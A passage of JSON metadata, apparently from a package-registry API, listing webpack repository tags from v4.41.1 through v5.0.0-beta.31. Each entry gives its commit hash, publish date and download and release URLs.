ublished_at":"2020-09-17T13:43:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31/manifests"},{"name":"v5.0.0-beta.30","sha":"922c95e9b458e44b999aca2c45d9540079a225b2","kind":"tag","published_at":"2020-09-11T21:55:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30/manifests"},{"name":"v5.0.0-beta.29","sha":"7bc3a031996d17d859d7a5b077ce1c5ab5dc7e29","kind":"tag","published_at":"2020-08-28T19:21:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29/manifests"},{"name":"v5.0.0-beta.28","sha":"e32daa9be5fed184c8befac87216a88872f7df4a","kind":"tag","published_at":"2020-08-20T09:42:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28/manifests"},{"name":"v5.0.0-beta.27","sha":"3cdff531d77ee63251a385e3b6e3ccca2ec37a64","kind":"tag","published_at":"2020-08-19T20:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27/manifests"},{"name":"v5.0.0-beta.26","sha":"f2b68e0b77a3b4199c0d6989eeb69bd9a0bdb2ed","kind":"tag","published_at":"2020-08-14T19:06:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26/manifests"},{"name":"v5.0.0-beta.25","sha":"377348be6c32895a3d440b3643963f71c730aa85","kind":"tag","published_at":"2020-08-10T14:13:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25/manifests"},{"name":"v5.0.0-beta.24","sha":"bcc93305d8558285d30ea7142517491c3cdfd46c","kind":"tag","published_at":"2020-08-05T12:29:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24/manifests"},{"name":"v5.0.0-beta.23","sha":"a14f073b358a9391dc70e791b6309adcdc21ec79","kind":"tag","published_at":"2020-08-02T05:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23/manifests"},{"name":"v4.44.1","sha":"cd4af164784f3938353102179adfcbcf8f53949d","kind":"tag","published_at":"2020-07-30T08:02:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1/manifests"},{"name":"v4.44.0","sha":"d4603c6d7ef4acfbe956ef49d8476c7368526989","kind":"tag","published_at":"2020-07-24T17:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0/manifests"},{"name":"v5.0.0-beta.22","sha":"00226ff3de02078c641ef0426a5425c184510b8a","kind":"tag","published_at":"2020-07-09T11:51:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22/manifests"},{"name":"v5.0.0-beta.21","sha":"20ba3c07803a3fd580755937016f0d5c85c1ccd3","kind":"tag","published_at":"2020-07-06T21:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21/manifests"},{"name":"v5.0.0-beta.20","sha":"8efea230e05561fbaf3f9872e01affcac399cb3a","kind":"tag","published_at":"2020-06-29T16:29:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20/manifests"},{"name":"v5.0.0-beta.19","sha":"3347fa1cee621c7f684b25507fdaed3264e8dcd9","kind":"tag","published_at":"2020-06-29T15:19:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19/manifests"},{"name":"v5.0.0-beta.18","sha":"5c9fdeb9e1158a45de2350a7e858f550d73adf55","kind":"tag","published_at":"2020-06-17T23:25:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18/manifests"},{"name":"v5.0.0-beta.17","sha":"a0716cf6bc074ec0d21fe72120cda103dabf8f9a","kind":"tag","published_at":"2020-06-03T07:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17/manifests"},{"name":"v5.0.0-beta.16","sha":"b7f08b42b85f89e52facac426251d26ec64f2e6d","kind":"tag","published_at":"2020-05-05T22:03:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16/manifests"},{"name":"v4.43.0","sha":"c9d4ff7b054fc581c96ce0e53432d44f9dd8ca72","kind":"tag","published_at":"2020-04-21T14:24:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0/manifests"},{"name":"v5.0.0-beta.15","sha":"4c7e5e667bd30affa2e8c3bc8c65fd38e90912fe","kind":"tag","published_at":"2020-04-21T12:06:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15/manifests"},{"name":"v4.42.1","sha":"71eb5931dbd7db125109a95692065333cea936a9","kind":"tag","published_at":"2020-03-24T06:23:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1/manifests"},{"name":"v5.0.0-beta.14","sha":"59f8dc824ec169252476fa5b476e14c95f7bda40","kind":"tag","published_at":"2020-03-02T16:32:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14/manifests"},{"name":"v4.42.0","sha":"29d851bf6d1e5d59eafb688d51396e70d12057c9","kind":"tag","published_at":"2020-03-02T08:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0/manifests"},{"name":"v4.41.6","sha":"71be3bfa45a55aa8ea1b954ab1302565bb073bbc","kind":"tag","published_at":"2020-02-11T10:16:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6/manifests"},{"name":"v5.0.0-beta.13","sha":"8445f06fa9abac1c98e6057af1c1fd2de63babbd","kind":"tag","published_at":"2020-01-29T21:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13/manifests"},{"name":"v5.0.0-beta.12","sha":"228c1caaaff0938be2792cd516e5171cc2ce5e49","kind":"tag","published_at":"2020-01-16T00:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12/manifests"},{"name":"v4.41.5","sha":"45ecebc9f0486c43efc7b56f2c31426d94a55264","kind":"tag","published_at":"2019-12-27T21:09:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5/manifests"},{"name":"v5.0.0-beta.11","sha":"3e3b7a2e363dc7746cbde1abbfa188e8aa7f1dea","kind":"tag","published_at":"2019-12-24T07:28:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11/manifests"},{"name":"v5.0.0-beta.10","sha":"bd21c4d04f15d54f3a8233b742aebdd4b62bb9c2","kind":"tag","published_at":"2019-12-22T00:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10/manifests"},{"name":"v4.41.4","sha":"dcc45dd977356f08061b2e9451792c6218910891","kind":"tag","published_at":"2019-12-19T07:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4/manifests"},{"name":"v4.41.3","sha":"df9f3eb7d9e4e60e53bfd1595d857bc7f912bc21","kind":"tag","published_at":"2019-12-16T09:33:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3/manifests"},{"name":"v5.0.0-beta.9","sha":"3ae73b62326e12546949e1d21db25b93b064e81b","kind":"tag","published_at":"2019-12-08T21:50:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9/manifests"},{"name":"v5.0.0-beta.8","sha":"9ffda5aee96a6456a2cfe11853d2a0bf5118c7cb","kind":"tag","published_at":"2019-12-08T21:44:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8/manifests"},{"name":"v5.0.0-beta.7","sha":"697ebe81e13681093e9e643986e5011e0aa3a398","kind":"tag","published_at":"2019-11-20T21:51:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7/manifests"},{"name":"v5.0.0-beta.6","sha":"de1e11b0b5209440a2992eb4ed7dd2ec30391c8f","kind":"tag","published_at":"2019-11-14T21:54:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6/manifests"},{"name":"v5.0.0-beta.5","sha":"85145cebf3ed50014b36e76047681bbb066bbe1f","kind":"tag","published_at":"2019-11-13T13:32:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5/manifests"},{"name":"v5.0.0-beta.4","sha":"f6f5364ad18fcf1b5a33e66d3350d6809ddb03e4","kind":"tag","published_at":"2019-11-12T18:09:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4/manifests"},{"name":"v5.0.0-beta.3","sha":"43afd3d8ee53eb31a61ac78d4bfe067cd63a7fab","kind":"tag","published_at":"2019-11-06T00:09:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3/manifests"},{"name":"v5.0.0-beta.2","sha":"b3e42f3d67df70d5d7cadb47efa2078b97a01ab8","kind":"tag","published_at":"2019-10-31T07:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2/manifests"},{"name":"v5.0.0-beta.1","sha":"4940cb1536967ecfafb4267b2e912ef376481896","kind":"tag","published_at":"2019-10-22T15:56:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1/manifests"},{"name":"v4.41.2","sha":"11e94dd2d0a8d8baae75e715ff8a69f27a9e3014","kind":"tag","published_at":"2019-10-15T13:01:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2/manifests"},{"name":"v5.0.0-beta.0","sha":"1bd85218c0e5adc54f381a63e4187e5fe435a81f","kind":"tag","published_at":"2019-10-11T12:58:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0/manifests"},{"name":"v5.0.0-alpha.32","sha":"8a73bc411b470f5d211053c99efbc1569d630f1b","kind":"tag","published_at":"2019-10-11T12:55:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32/manifests"},{"name":"v4.41.1","sha":"dcfda0061cef24d68312216893da0b38f4a670f9","kind":"tag","published_at":"2019-10-11T11:42:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1/manifests"},{"name":"v5.0.0-alpha.31","sha":"2bebf88509441835b71af9904e574ea6303642b7","kind":"tag","published_at":"2019-10-10T20:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.31","html_url":"https://github.c